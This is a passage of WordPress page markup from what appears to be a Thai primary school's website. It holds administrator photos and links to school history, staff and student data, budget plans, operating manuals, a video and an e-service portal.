{\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" 